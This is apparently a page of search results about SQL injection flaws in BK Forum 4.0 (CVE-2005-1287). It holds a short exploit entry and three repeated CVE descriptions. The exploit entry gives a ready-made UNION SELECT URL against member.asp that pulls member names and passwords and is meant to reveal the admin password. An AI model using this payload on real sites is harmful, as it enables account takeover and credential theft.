4 matches found
BK Forum 4.0 - 'member.asp' SQL Injection
BK Forum Exploit: First you must be logged in Then type this in your browser http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 You will find admin's password Shoutz: nukedx , nukedx , nukedx : , cijfer ...
CVE-2005-1287
Multiple SQL injection vulnerabilities in BK Forum 4.0 allow remote attackers to execute arbitrary SQL commands via the 1 id parameter to member.asp, 2 forum parameter to forum.asp, or 3 various parameters in register.asp...
CVE-2005-1287
BK Forum 4.0 contains multiple SQL injection vulnerabilities that allow remote attackers to execute arbitrary SQL commands via (1) id parameter to member.asp, (2) forum parameter to forum.asp, or (3) various parameters in register.asp.
CVE-2005-1287
Multiple SQL injection vulnerabilities in BK Forum 4.0 allow remote attackers to execute arbitrary SQL commands via the 1 id parameter to member.asp, 2 forum parameter to forum.asp, or 3 various parameters in register.asp...